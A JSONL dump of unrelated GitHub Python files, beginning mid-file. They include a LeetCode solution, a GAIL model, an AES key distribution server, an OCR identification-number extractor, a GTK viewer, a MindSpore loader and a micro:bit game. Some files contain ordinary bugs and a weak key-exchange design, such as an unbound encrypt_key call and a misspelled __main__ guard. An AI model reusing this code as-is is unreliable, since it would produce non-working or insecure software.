cfg.port())\r\n sender.start_stream()\r\n \r\n while input(\"\") != \"STOP\":\r\n #time.sleep(0.001)\r\n continue\r\n \r\n sender.stop_stream()\r\n \r\n main()\r\n","repo_name":"zmalin/oybproject","sub_path":"oybstreamclient.py","file_name":"oybstreamclient.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37804835572","text":"from random import randint\nclass ListNode(object):\n\n\tdef __init__(self,x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution(object):\n\n\tdef __init__(self,head):\n\t\tself.head = head\n\n\n\tdef getRandom(self):\n\t\tselected = []\n\t\tk = 1\n\t\tcur_node = self.head\n\t\ti = 0\n\t\twhile cur_node:\n\t\t\tif i < k:\n\t\t\t\tselected.append(cur_node.val)\n\t\t\telse:\n\t\t\t\ts = randint(0,i)\n\t\t\t\tif s < k:\n\t\t\t\t\tselected[randint(0,k-1)] = cur_node.val\n\t\t\tcur_node = cur_node.next\n\t\t\ti+=1\n\n\t\treturn selected[0]\n\n\ndef main():\n\thead = ListNode(1)\n\thead.next = ListNode(6)\n\thead.next.next = ListNode(10)\n\ts = Solution(head)\n\tprint(s.getRandom())\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"msaffarm/InterviewPrep","sub_path":"LeetCode/ReservoirSampling/382-LinkedListRandomNode.py","file_name":"382-LinkedListRandomNode.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27774823642","text":"\"\"\"\n@Project : Imitation-Learning\n@File : model\n@Author : XiaoBanni\n@Date : 2021-05-02 18:38\n@Desc : \n\"\"\"\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.distributions import Normal\n\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n # The weight is initialized to a normal distribution\n nn.init.normal_(m.weight, mean=0., std=0.1)\n # The bias is initialized to a constant\n nn.init.constant_(m.bias, 0.1)\n\n\ndef expert_reward(cfg, agent, state, action):\n \"\"\"\n The discriminator scores state-action pairs\n :param cfg:\n :param agent:\n :param state:\n :param action:\n :return:\n \"\"\"\n # .cpu()\n # Returns a copy of this object in CPU memory.\n\n # numpy cannot read CUDA tensor and\n # needs to convert it to CPU tensor\n # >>> a=torch.Tensor([1,2,3,4]).to(\"cuda\")\n # >>> a.numpy()\n # Traceback (most recent call last):\n # File \"\", line 1, in \n # TypeError: can't convert cuda:0 device type tensor to numpy. Use\n # Tensor.cpu() to copy the tensor to host memory first.\n state = state.cpu().numpy()\n state_action = torch.FloatTensor(np.concatenate([state, action], 1)).to(cfg.device)\n return -np.log(agent.discriminator(state_action).cpu().data.numpy())\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_dim, hidden_dim):\n super(Discriminator, self).__init__()\n\n self.linear1 = nn.Linear(input_dim, hidden_dim)\n self.linear2 = nn.Linear(hidden_dim, hidden_dim)\n self.linear3 = nn.Linear(hidden_dim, 1)\n\n # >>> m=nn.Linear(10,1)\n # >>> m\n # Linear(in_features=10, out_features=1, bias=True)\n # >>> m.weight\n # Parameter containing:\n # tensor([[ 0.0154, 0.2331, -0.1645, -0.1201, -0.0739, 0.0450, 0.0548, -0.2106,\n # -0.0479, 0.0109]], requires_grad=True)\n # >>> m.bias\n # Parameter containing:\n # tensor([-0.2276], requires_grad=True)\n # >>> m.weight.data.mul_(0.1)\n # tensor([[ 0.0015, 0.0233, -0.0164, -0.0120, -0.0074, 0.0045, 0.0055, -0.0211,\n # -0.0048, 0.0011]])\n # >>> m.weight.data.mul_(0.1)\n # tensor([[ 0.0002, 0.0023, -0.0016, -0.0012, -0.0007, 0.0004, 0.0005, -0.0021,\n # -0.0005, 0.0001]])\n # >>> m.bias.data.mul_(0)\n # tensor([-0.])\n self.linear3.weight.data.mul_(0.1)\n self.linear3.bias.data.mul_(0.0)\n\n def forward(self, x):\n # Discriminator measures the occupancy measurement\n x = torch.tanh(self.linear1(x))\n x = torch.tanh(self.linear2(x))\n prob = torch.sigmoid(self.linear3(x))\n return prob\n\n\nclass AdvantageActorCritic(nn.Module):\n def __init__(self, input_dim, output_dim, hidden_dim, std=0.0):\n super(AdvantageActorCritic, self).__init__()\n self.actor = nn.Sequential(\n nn.Linear(input_dim, hidden_dim),\n nn.ReLU(),\n nn.Linear(hidden_dim, output_dim)\n )\n\n self.critic = nn.Sequential(\n nn.Linear(input_dim, hidden_dim),\n nn.ReLU(),\n nn.Linear(hidden_dim, 1)\n )\n\n # torch.nn.Parameter():\n # A kind of Tensor that is to be considered a module parameter.\n #\n # Parameters are Tensor subclasses,\n # that have a very special property when used with Module s -\n # when they’re assigned as Module attributes\n # they are automatically added to the list of its parameters,\n # and will appear e.g. in parameters() iterator.\n # Assigning a Tensor doesn’t have such effect.\n # This is because one might want to cache some temporary state,\n # like last hidden state of the RNN, in the model.\n # If there was no such class as Parameter,\n # these temporaries would get registered too.\n #\n # >>> torch.Tensor([1,2,3]).requires_grad\n # False\n # >>> torch.nn.Parameter(torch.Tensor([1,2,3])).requires_grad\n # True\n\n # torch.ones():\n # Returns a tensor filled with the scalar value 1,\n # with the shape defined by the variable argument size.\n self.log_std = nn.Parameter(torch.ones(1, output_dim) * std)\n # .apply(fn)\n # Applies fn recursively to every submodule (as returned by .children()) as well as self.\n # Typical use includes initializing the parameters of a model (see also torch.nn.init).\n self.apply(init_weights)\n\n def forward(self, x):\n mu = self.actor(x) # Mean\n std = self.log_std.exp().expand_as(mu) # Standard deviation\n value = self.critic(x)\n # .expand_as()\n # Expand this tensor to the same size as other. \n # self.expand_as(other) is equivalent to self.expand(other.size()).\n # torch.distributions.normal.Normal(loc, scale, validate_args=None)\n # Creates a normal (also called Gaussian) distribution parameterized by loc and scale.\n # >>> m = Normal(10.0, 1.0)\n # >>> [m.sample() for _ in range(5)]\n # [tensor(10.1613), tensor(11.9001), tensor(9.9001), tensor(10.3850), tensor(8.3563)]\n # >>> m = Normal(10.0, 10.0)\n # >>> [m.sample() for _ in range(5)]\n # [tensor(31.3052), tensor(3.3538), tensor(14.1421), tensor(10.1337), tensor(11.1297)]\n\n # >>> m = Normal(torch.Tensor([10.0,20.0]), torch.Tensor([1.0,10.0]))\n # >>> m.sample()\n # tensor([10.0209, 32.5655])\n dist = Normal(mu, std) # Normal distribution\n return dist, value\n","repo_name":"xiaobanni/plainRL","sub_path":"IL/GAIL/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"23975260512","text":"import socket\r\nimport threading\r\nfrom Crypto.Cipher import AES\r\nfrom Cryptodome.Util.Padding import pad\r\n\r\nfrom Encrypt_Decrypt import *\r\nimport secrets\r\n\r\n# Read the keys from the files\r\nwith open('key_master_a.txt', 'rb') as f:\r\n key_master_a = f.read()\r\n\r\nwith open('key_master_b.txt', 'rb') as f:\r\n key_master_b = f.read()\r\n\r\nclass KeyDistributionServer:\r\n def __init__(self, host, port):\r\n self.host = host\r\n self.port = port\r\n self.users = {}\r\n\r\n @staticmethod\r\n def generate_random_key():\r\n key_length = 16 # 16 bytes (128 bits)\r\n random_bytes = secrets.token_bytes(key_length)\r\n return bytes(random_bytes)\r\n\r\n def encrypt_key(message: bytes, key: bytes) -> bytes:\r\n # Create an AES cipher object with the key and a random initialization vector (IV)\r\n cipher = AES.new(key, AES.MODE_CBC)\r\n iv = cipher.iv\r\n\r\n # Pad the message to make it a multiple of the block size and encode it as bytes\r\n padded_message = pad(message, AES.block_size)\r\n\r\n # Encrypt the padded message\r\n encrypted_message = cipher.encrypt(padded_message)\r\n\r\n # Return the IV and encrypted message\r\n return iv + encrypted_message\r\n\r\n def run(self):\r\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n server_socket.bind((self.host, self.port))\r\n server_socket.listen(5)\r\n print(\"Key Distribution Server started on {}:{}\".format(self.host, self.port))\r\n\r\n while True:\r\n client_socket, client_address = server_socket.accept()\r\n client_thread = threading.Thread(target=self.handle_client, args=(client_socket, client_address))\r\n client_thread.start()\r\n print(f\"[ACTIVE CONNECTIONS] {threading.active_count() - 1} \\n\")\r\n\r\n def handle_client(self, client_socket, client_address):\r\n print(f\"[NEW CONNECTION] {client_address} connected.\")\r\n\r\n self.handle_key_request(client_socket)\r\n\r\n print(f\"[CONNECTION CLOSING] {client_address} closed.\")\r\n client_socket.close()\r\n def handle_key_request(self, client_socket):\r\n\r\n sessionkey = self.generate_random_key()\r\n\r\n print(f\"Session Key generated is: {sessionkey}\")\r\n\r\n encrypted_session_key_a = encrypt_key(sessionkey, key_master_a)\r\n encrypted_session_key_b = encrypt_key(sessionkey, key_master_b)\r\n\r\n client_socket.send(encrypted_session_key_a)\r\n client_socket.send(encrypted_session_key_b)\r\n\r\n\r\n# Example usage\r\nif __name__ == \"__main__\":\r\n server = KeyDistributionServer('localhost', 5000)\r\n server.run()","repo_name":"mazentarrek/Email-End-to-End-Secure-Encryption-Project","sub_path":"KeyDistributionServer.py","file_name":"KeyDistributionServer.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26394974782","text":"import os\nimport sys\n\nfrom pathlib import Path\n\nsys.path.append(\n os.path.abspath(\n Path(__file__).resolve().parent.parent.parent\n )\n)\n\nimport XHelp as App\n\nclass DBMapper:\n class Settings:\n def get (key):\n if (key in (0, 'all', 'entire',)):\n return (\n 'disappearingMessages',\n 'sessionTimeout',\n )\n elif (key in (1, 'disappearingMessages')):\n return (\n 0\n if (App.Configuration.disappearingMessages == False)\n else 1\n )\n elif (key in (2, 'sessionTimeout')):\n return App.Configuration.sessionTimeout\n \n return None\n \n def update (key, value):\n if (key in (1, 'disappearingMessages')):\n App.Configuration.disappearingMessages = (\n False\n if (int(value) == 0)\n else True\n )\n elif (key in (2, 'sessionTimeout')):\n App.Configuration.sessionTimeout = int(value)\n \n return None\n","repo_name":"Project-K-Official/kavach-help","sub_path":"xhelp/XHelp/database/dBMapper.py","file_name":"dBMapper.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22566607131","text":"from datetime import datetime\nimport os\n\nfrom texttable import Texttable\n\n\n# MODULES_TYPES = {\n# \"scanner\":\"scanner\",\n# \"exploit\":\"exploit\",\n# \"bruteforcer\":\"bruteforcer\"\n# }\n\n# Prints message with current time\ndef time_print(msg, end=\"\\n\"):\n current_time = datetime.strftime(datetime.now(), \"%Y-%m-%d %H:%M:%S\")\n print(\"[%s]\" % current_time, msg, end=end)\n\n\n# Prints message with current time as progress\ndef time_print_progress(msg):\n current_time = datetime.strftime(datetime.now(), \"%Y-%m-%d %H:%M:%S\")\n print(\"\\r[%s] %s\" % (current_time, msg), end=\"\")\n\n\n# Clears screen\ndef clear_screen():\n func = \"cls\" if os.name == \"nt\" else \"clear\"\n os.system(func)\n\n\n# Returns modules table for printing\ndef get_modules_search_table(search_term, _map):\n table = Texttable()\n # _map = get_modules_map()\n all_rows = []\n all_rows.append([\"Id\", \"Type\", \"Name\", \"Description\"])\n for v in _map:\n tmp_name = v['use_name']\n tmp_type = v['handle'].__info__[\"type\"]\n tmp_description = v['handle'].__info__[\"description\"]\n tmp_id = v['id']\n if search_term in tmp_name:\n all_rows.append(\n [tmp_id, tmp_type, tmp_name, tmp_description]\n )\n # import pdb; pdb.set_trace()\n table.add_rows(all_rows)\n if len(all_rows) > 1:\n ret = table.draw() + \"\\n\"\n else:\n ret = \"No results for: %s\" % search_term\n return ret\n\n\n# returns banner\ndef get_banner():\n banner = \"\"\"\n\n noname\n\n \"\"\"\n return banner\n","repo_name":"rolzwy7/stack","sub_path":"_dropped/utils/print_utils.py","file_name":"print_utils.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"48254627544","text":"import streamlit as st\nimport cv2\nimport pytesseract\nimport tempfile\nimport os\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph\nfrom reportlab.lib.styles import getSampleStyleSheet\nimport re\nimport pandas as pd\n\n# Set the path to the Tesseract executable\npytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n\n# Sample data for training the SVM model (you need to replace this with your labeled data)\ndata = [\n {\"text\": \"1234567890\", \"label\": \"identification_number\"},\n {\"text\": \"DL No. : ABC1234567 1234\", \"label\": \"identification_number\"},\n {\"text\": \"Aadhar Card No. 123456789012\", \"label\": \"identification_number\"},\n {\"text\": \"PAN Card No. ABCDE1234F\", \"label\": \"identification_number\"},\n {\"text\": \"Voter ID No. ABCDE1234F\", \"label\": \"identification_number\"},\n {\"text\": \"Passport No. P12345678\", \"label\": \"identification_number\"},\n {\"text\": \"GSTIN No. 12ABCDE3456F7G8\", \"label\": \"identification_number\"},\n {\"text\": \"EPIC No. ABCDE1234F\", \"label\": \"identification_number\"},\n {\"text\": \"IFSC Code: ABCD1234567\", \"label\": \"identification_number\"},\n {\"text\": \"MICR Code: 123456789\", \"label\": \"identification_number\"},\n {\"text\": \"UPC Code: 0A1B2C3D\", \"label\": \"identification_number\"},\n {\"text\": \"ESIC No. 1234567890\", \"label\": \"identification_number\"},\n {\"text\": \"TIN No. AB123456789012\", \"label\": \"identification_number\"},\n {\"text\": \"UAN No. 123456789012\", \"label\": \"identification_number\"},\n {\"text\": \"IMEI No. 123456789012345\", \"label\": \"identification_number\"},\n {\"text\": \"SIM No. 12345678901234567890\", \"label\": \"identification_number\"},\n {\"text\": \"Patent No. 315456\", \"label\": \"patent_number\"},\n {\"text\": \"WHI7595242\", \"label\": \"election_number\"},\n {\"text\": \"Certificate No. IN-at78944260000018\", \"label\": \"certificate_number\"},\n {\"text\": \"Certcate No IN-at78944260000018\", \"label\": \"certificate_number\"}, # Example certificate number\n # Add more labeled examples here\n]\n\n# Convert the labeled data into a DataFrame\ndf = pd.DataFrame(data)\n\n# Split the data into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(df[\"text\"], df[\"label\"], test_size=0.2, random_state=42)\n\n# Create TF-IDF vectors from the text data\nvectorizer = TfidfVectorizer()\nX_train_tfidf = vectorizer.fit_transform(X_train)\nX_test_tfidf = vectorizer.transform(X_test)\n\n# Train an SVM classifier\nsvm_classifier = SVC(kernel=\"linear\")\nsvm_classifier.fit(X_train_tfidf, y_train)\n\n# Define regular expression patterns for identification numbers using RE2\nidentification_patterns = [\n # Patterns for unique identification numbers\n r'\\b\\d{10}\\b', # Matches 10-digit numbers\n r'DL No\\. : [A-Z0-9]+\\s\\d{4,}', # DL No. : \n r'Civil Case No\\. \\d{4}/\\d{4}', # Civil Case No. 1234/5678\n r'VA-\\d+', # VA-123\n r'Aff-\\d+', # Aff-456\n r'APL-\\d+', # APL-789\n r'Evidence ID-\\d+', # Evidence ID-987\n r'Witness ID-[A-Z]\\d+', # Witness ID-A123\n r'Order No\\. \\d{3}/\\d{4}', # Order No. 123/5678\n r'BB-\\d{4}-\\d{3}', # BB-1234-567\n r'CS-\\d{4}-\\d{3}', # CS-1234-567\n r'CD-\\d+', # CD-123\n r'MP-\\d{4}-\\d{3}', # MP-1234-567\n r'CA-\\d{4}-\\d{3}', # CA-1234-567\n r'ER-\\d{4}-\\d{3}', # ER-1234-567\n r'PIL No\\. \\d{3}/\\d{4}', # PIL No. 123/5678\n r'Motion No\\. [A-Z]{2}-\\d{3}', # Motion No. AB-123\n r'Adjournment Application - AA-\\d{4}-\\d{3}', # Adjournment Application - AA-1234-567\n r'EA-\\d{4}-\\d{3}', # EA-1234-567\n r'LN-\\d{4}-\\d{3}', # LN-1234-567\n r'SA-\\d{4}-\\d{3}', # SA-1234-567\n r'RA-\\d{4}-\\d{3}', # RA-1234-567\n r'CC-\\d{4}-\\d{3}', # CC-1234-567\n r'MA-\\d{4}-\\d{3}', # MA-1234-567\n r'Patent No\\. \\d+', # Matches \"Patent No. 315456\" format\n r'Certificate No\\. [A-Z0-9-]+', # Matches \"Certificate No.\" followed by alphanumeric characters and hyphens\n r'Certcate No\\. IN-at78944260000018', # Matches the specific certificate number\n # Patterns for other court-related identifiers and information\n r'Case No\\. [A-Z0-9]+\\s\\d{4,}', # Case No. XYZ 1234\n r'Suit No\\. \\d{4}/\\d{4}', # Suit No. 1234/5678\n r'Writ Petition No\\. \\d{4}/\\d{4}', # Writ Petition No. 1234/5678\n r'Criminal Case No\\. [A-Z]+\\s\\d{4}',# Criminal Case No. ABC 1234\n r'Appeal No\\. \\d+', # Appeal No. 123\n r'Revision Petition No\\. [A-Z]+\\s\\d{4}', # Revision Petition No. DEF 1234\n r'ID [A-Z0-9]+\\s\\d{10}', # ID ABC1234567 1234567890\n r'Adhar Card No\\. \\d{12}', # Adhar Card No. 123456789012\n r'Permanent Account Number Card\\. [A-Z]{5}\\d{4}[A-Z]',# PAN Card No.ABCDE1234F\n r'FIR No\\. [A-Z]{3}/\\d{3}/\\d{4}', # FIR No. XYZ/123/2023\n r'Complaint No\\. \\d{4}/\\d{4}', # Complaint No. 1234/5678\n r'Suit for Declaration', # Suit for Declaration\n r'Petition for Divorce', # Petition for Divorce\n r'Ruling in Case No\\. [A-Z0-9]+\\s\\d{4,}', # Ruling in Case No. XYZ 1234\n r'Order of [A-Z]+\\sCourt', # Order of High Court\n # r'Judgment dated \\d{2}/\\d{2}/\\d{4}', # Judgment dated 01/12/2023\n # r'\\d{2}/\\d{2}/\\d{4}', # Date in DD/MM/YYYY format\n # r'\\d{1,2}-\\d{1,2}-\\d{4}', # Date in D-M-YYYY format\n r'Registered Office: [A-Za-z\\s]+', # Registered Office: ABC Law Firm\n r'Advocate [A-Za-z\\s]+', # Advocate Mr. John Doe\n # Patterns for Indian government document identification numbers\n r'Aadhar Card No\\. \\d{12}', # Aadhar Card No. 123456789012 (12-digit)\n r'PAN Card No\\. [A-Z]{5}\\d{4}[A-Z]', # PAN Card No. ABCDE1234F\n r'Voter ID No\\. [A-Z0-9]{10}', # Voter ID No. ABCDE1234F\n r'Passport No\\. [A-Z0-9]+\\d+', # Passport No. P12345678 (Alphanumeric)\n r'GSTIN No\\. [0-9A-Z]{15}', # GSTIN No. 12ABCDE3456F7G8 (15-character)\n r'EPIC No\\. [A-Z0-9]{10}', # EPIC No. ABCDE1234F (10-character)\n r'IFSC Code: [A-Z]{4}\\d{7}', # IFSC Code: ABCD1234567\n r'MICR Code: \\d{9}', # MICR Code: 123456789\n r'UPC Code: [0-9A-F]+', # UPC Code: 0A1B2C3D\n r'ESIC No\\. \\d{10}', # ESIC No. 1234567890 (10-digit)\n r'TIN No\\. [A-Z]{2}\\d{11}', # TIN No. AB123456789012 (13-character)\n r'UAN No\\. \\d{12}', # UAN No. 123456789012 (12-digit)\n r'IMEI No\\. \\d{15}', # IMEI No. 123456789012345 (15-digit)\n r'SIM No\\. \\d{20}', # SIM No. 12345678901234567890 (20-digit)\n # r'[A-Z0-9]{9}', # Matches 9-character alphanumeric election numbers remember it\n# Add more patterns as needed\n \n\n]\n\ndef classify_text_segments(text_segments):\n classified_segments = []\n for text_segment in text_segments:\n tfidf_vector = vectorizer.transform([text_segment])\n classification = svm_classifier.predict(tfidf_vector)[0]\n classified_segments.append({\"text\": text_segment, \"classification\": classification})\n return classified_segments\n\ndef extract_identification_numbers(img_path):\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n custom_config = r'--oem 3 --psm 6'\n detected_text = pytesseract.image_to_string(img, config=custom_config)\n\n # Extract text using regular expressions\n extracted_text = \"\"\n for pattern in identification_patterns:\n identification_numbers = re.findall(pattern, detected_text)\n extracted_text += \"\\n\".join(identification_numbers) + \"\\n\"\n\n # Classify each extracted text segment using the SVM classifier\n classified_identification_numbers = classify_text_segments(identification_numbers)\n\n return detected_text, extracted_text, classified_identification_numbers\n\ndef main():\n st.title(\"Text and Identification Number Extractor with Patterns\")\n\n uploaded_image = st.file_uploader(\"Upload an image...\", type=[\"jpg\", \"jpeg\", \"png\"])\n\n if uploaded_image:\n st.image(uploaded_image, caption=\"Uploaded Image\", use_column_width=True)\n st.write(\"Extracted Text:\")\n st.write(\"Please wait while we process the image...\")\n\n # Save the uploaded image to a temporary file\n temp_img = tempfile.NamedTemporaryFile(delete=False, suffix=\".png\")\n temp_img.write(uploaded_image.read())\n temp_img_path = temp_img.name\n\n # Close the temporary file to release the resource\n temp_img.close()\n\n # Extract text, patterns, and classify identification numbers when the user uploads an image\n text, extracted_text, classified_identification_numbers = extract_identification_numbers(temp_img_path)\n\n # Display the extracted text\n st.write(text)\n\n # Display the extracted identification numbers\n st.write(\"Extracted Identification Numbers:\")\n st.write(extracted_text)\n\n # Display the classified identification numbers\n st.write(\"Classified Identification Numbers:\")\n for i, segment in enumerate(classified_identification_numbers, 1):\n st.write(f\"{i}. Text: {segment['text']}, Classification: {segment['classification']}\")\n\n # Create a button to download the extracted text and classified numbers as a PDF file\n if st.button(\"Download as PDF\"):\n pdf_filename = \"extracted_data.pdf\"\n doc = SimpleDocTemplate(pdf_filename, pagesize=letter)\n styles = getSampleStyleSheet()\n style = styles[\"Normal\"]\n elements = []\n\n # Add detected sentences to the PDF\n sentences = text.split('\\n\\n')\n for sentence in sentences:\n p = Paragraph(sentence, style)\n elements.append(p)\n\n # Add classified identification numbers to the PDF\n for segment in classified_identification_numbers:\n p = Paragraph(f\"Text: {segment['text']}, Classification: {segment['classification']}\", style)\n elements.append(p)\n\n doc.build(elements)\n st.success(f\"[Download PDF]({pdf_filename})\")\n\n # Remove the temporary image file after closing it\n os.remove(temp_img_path)\n\nif _name_ == \"_main_\":\n main()","repo_name":"ShubhamS2003/orcBlockchain","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":10646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22701556355","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#This class represents the main User Interface.\n#It give the options to search, view current online streams\n#and to view favourites\n\nimport gtk,webkit,streamViewer,sys,searchBox,search,onlineStreams,favourites\t\n\t\nclass Options():\n\tdef __init__(self):\n\t\n\t\t#Setup the main window\n\t\tself.options = gtk.Window()\n\t\tself.options.set_position(gtk.WIN_POS_CENTER)\n\t\tself.options.set_title('Dual Craft')\n\t\tself.options.set_default_size(500,500)\n\t\tself.options.connect('destroy', lambda w: gtk.main_quit())\n\t\tself.b1 = gtk.VBox()\n\t\tself.options.add(self.b1)\n\t\tself.options.set_default_size(500,500)\n\n\t\t#Create buttons\n\t\tself.button1 = gtk.Button(\"Search\")\n\t\tself.button2 = gtk.Button(\"Online\")\n\t\tself.button3 = gtk.Button('Favourites')\n\n\t\t#Add buttons to the main window\n\t\tself.b1.pack_start(self.button1)\n\t\tself.b1.pack_start(self.button2)\n\t\tself.b1.pack_start(self.button3)\n\t\n\t\t#Set onClick actions\n\t\tself.button1.connect('clicked', self.showSearchWindow)\n\t\tself.button2.connect('clicked', self.showOnline)\n\t\tself.button3.connect('clicked', self.showFavouritesWindow)\n\n\t\t#Show the window\n\t\tself.options.show_all()\n\t\tgtk.main()\n\n\t#Display a search window\n\tdef showSearchWindow(self, object):\n\t\ttest = searchBox.Main()\n\t\n\t#Display category and sub-category options for currently online streams\n\tdef showOnline(self, object):\n\t\ts = onlineStreams.streamTypeChoice()\n\t\n\t#Show the users favourites\n\tdef showFavouritesWindow(self,object):\n\t\tf = favourites.Favourites()\n\t\tf.showAll()\n\t\t\n\nif __name__ == '__main__':\n\tsys.exit()\n","repo_name":"YYZ/StreamViewer","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"660212837","text":"import mindspore.common.dtype as mstype\nimport mindspore.dataset.engine as de\n\nimport mindspore.dataset.vision.c_transforms as C\nimport mindspore.dataset.transforms.c_transforms as C2\nimport mindspore.dataset.vision as C\nimport mindspore.dataset.transforms as C2\n\ndef create_dataset(dataset_path, do_train, repeat_num=1, batch_size=32):\n\n ds = de.Cifar10Dataset(dataset_path, num_parallel_workers=4, shuffle=True)\n\n\n rescale = 1.0 / 255.0\n shift = 0.0\n\n # define map operations\n random_crop_op = C.RandomCrop((32, 32), (4, 4, 4, 4))\n random_horizontal_flip_op = C.RandomHorizontalFlip()\n\n rescale_op = C.Rescale(rescale, shift)\n change_swap_op = C.HWC2CHW()\n\n trans = []\n if do_train:\n trans += [random_crop_op, random_horizontal_flip_op]\n\n trans += [rescale_op, change_swap_op]\n\n type_cast_op = C2.TypeCast(mstype.int32)\n\n ds = ds.map(input_columns=\"label\", operations=type_cast_op)\n ds = ds.map(input_columns=\"image\", operations=trans)\n\n # apply shuffle operations\n ds = ds.shuffle(buffer_size=100)\n\n # apply batch operations\n ds = ds.batch(batch_size, drop_remainder=True)\n\n # apply dataset repeat operation\n ds = ds.repeat(repeat_num)\n\n return ds","repo_name":"Shuijing2018/CwR_Mindspore","sub_path":"utils_data.py","file_name":"utils_data.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16916455719","text":"# Name: Starbit Commander II\n# Coder: Marco Janssen (twitter @marc0janssen)\n# stardate: 2021-04-07\n# version: 1.0.4\n# notes: Explosion code borrowed with permission from Derek Graham.\n# notes: https://deejaygraham.github.io/2016/10/28/tiny-asteroids-for-microbit/\n# notes: All other code is my own.\n# notes: This code will only run on v2 versions of the microbit\n\n\nfrom microbit import display, button_a, button_b, sleep\nfrom random import randint, randrange\n\n\nclass Game:\n def __init__(self):\n self.screenMinX, self.screenMinY = 0, 0\n self.screenMaxX, self.screenMaxY = 4, 4\n self.brightnessMin, self.brightnessMax = 0, 9\n self.score = 0\n self.frameRate = 1000\n self.chanceSecondAstroid = 15\n self.scoreBonus = 1\n self.ticks = 0\n self.rowOfAstroids = 2\n\n def gameOver(self):\n spaceShip.blowUpShip()\n sleep(300)\n display.scroll(\"Game Over\")\n sleep(300)\n display.scroll(\"Score : \" + str(self.score))\n sleep(500)\n display.scroll(\"Marco Janssen (c)2021\", delay=50)\n\n def countScore(self):\n self.score += self.scoreBonus\n\n def increaseDifficulty(self):\n if self.ticks % 10 == 0:\n self.frameRate = max(self.frameRate - 100, 400)\n self.scoreBonus += 1\n\n if self.ticks % 15 == 0:\n self.chanceSecondAstroid = max(self.chanceSecondAstroid - 2, 3)\n self.scoreBonus += 3\n\n if self.ticks % 25 == 0:\n self.rowOfAstroids = min(self.rowOfAstroids + 1, 5)\n self.scoreBonus += 5\n\n def gameStart(self):\n\n display.scroll(\"3... 2... 1... Launch...\", delay=70)\n\n while True:\n astroidField.createAstroid()\n\n astroidField.drawAstroids()\n spaceShip.draw()\n\n if spaceShip.collide():\n self.gameOver()\n break\n\n sleep(self.frameRate)\n\n astroidField.hideAstroids()\n spaceShip.hide()\n\n if button_a.was_pressed():\n spaceShip.moveLeft()\n elif button_b.was_pressed():\n spaceShip.moveRight()\n\n astroidField.moveAstroids()\n astroidField.clearPassedAstroids()\n self.increaseDifficulty()\n\n\nclass Spaceship:\n def __init__(self):\n self.properties = [2, game.screenMaxY, game.brightnessMax]\n\n def moveLeft(self):\n self.properties[0] = max(self.properties[0] - 1, game.screenMinX)\n\n def moveRight(self):\n self.properties[0] = min(self.properties[0] + 1, game.screenMaxX)\n\n def draw(self):\n display.set_pixel(\n self.properties[0], self.properties[1], self.properties[2])\n\n def hide(self):\n display.set_pixel(\n self.properties[0], self.properties[1], game.brightnessMin)\n\n def collide(self):\n for astroid in astroidField.astroidField:\n if (\n astroid.properties[0] == self.properties[0]\n and astroid.properties[1] == self.properties[1]\n ):\n return True\n return False\n\n def blowUpShip(self):\n self.hide()\n\n self.drawExplosion(self.properties[2], 1)\n sleep(200)\n display.clear()\n\n for brightness in range(self.properties[2], 0, -1):\n self.drawExplosion(brightness, 2)\n sleep(200)\n display.clear()\n\n def drawExplosion(self, brightness, radius):\n x = self.properties[0]\n y = self.properties[1]\n left_of_centre = x - radius\n right_of_centre = x + radius\n above_centre = y - radius\n\n if left_of_centre >= game.screenMinX:\n display.set_pixel(left_of_centre, y, brightness)\n display.set_pixel(left_of_centre, above_centre, brightness)\n\n display.set_pixel(x, above_centre, brightness)\n\n if right_of_centre <= game.screenMaxX:\n display.set_pixel(right_of_centre, y, brightness)\n display.set_pixel(right_of_centre, above_centre, brightness)\n\n\nclass Astroid:\n def __init__(self):\n self.properties = [0, 0, 0]\n self.properties[0] = randint(game.screenMinX, game.screenMaxX)\n self.properties[2] = randint(\n game.brightnessMin + 1, game.brightnessMax - 3\n )\n\n def draw(self):\n display.set_pixel(\n self.properties[0], self.properties[1], self.properties[2])\n\n def hide(self):\n display.set_pixel(\n self.properties[0], self.properties[1], game.brightnessMin)\n\n def move(self):\n self.properties[1] = min(self.properties[1] + 1, game.screenMaxY + 1)\n\n\nclass AstroidField:\n def __init__(self):\n self.astroidField = []\n\n def drawAstroids(self):\n for astroid in self.astroidField:\n astroid.draw()\n\n def moveAstroids(self):\n for astroid in self.astroidField:\n astroid.move()\n\n game.ticks += 1\n\n def clearPassedAstroids(self):\n for astroid in self.astroidField:\n if self.astroidField[0].properties[1] 